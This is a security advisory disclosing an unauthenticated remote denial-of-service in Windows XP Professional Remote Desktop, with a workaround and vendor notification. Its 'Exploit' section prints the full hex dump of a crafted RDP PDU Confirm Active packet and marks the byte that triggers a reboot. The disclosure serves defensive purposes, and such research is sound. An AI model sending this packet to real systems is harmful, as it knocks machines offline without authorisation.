Vulnerable
Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3
Non-vulnerable
Microsoft Windows 2000 Server
Background
Windows XP Professional has a remote denial of service attack when Remote
Desktop is enabled. Remote Desktop is XP Professional's single-user RDP
server (Terminal Services).
Discussion
At the start of the protocol there is a negotiation of client and server
graphics capabilities, in a packet called PDU Confirm Active. A block of
32 bytes in this packet allows the client to disable the drawing commands
that it does not support.
One of these apparently controls whether the Pattern BLT command is sent.
On Windows 2000 Server, disabling this command will make the server send
bitmaps instead of Pattern BLT commands. However, Windows XP Professional
apparently reboots when it tries to render patterns; since this happens
while the login screen is being drawn, this does not require the client to
have logged on or authenticated to the server. This applies to all
versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also
reproducible with Windows .NET Standard Server Beta 3.
Workaround
Disable Remote Desktop (from Control Panel, System, Remote, Remote
Desktop, deselect the option "Allow users to connect remotely to this
computer").
Exploit
Shown below is the unencrypted packet contents for the problematic PDU
Confirm Active packet. The only change is from 01 to 00 on the line
indicated.
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
References
Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals
for telematic services, ITU-T.
Microsoft was notified on 16 April 2002.
Credits
Ben Cohen
[email protected]
Skygate Technology Ltd.
http://www.skygate.co.uk/
+44 (0)20 8542 7856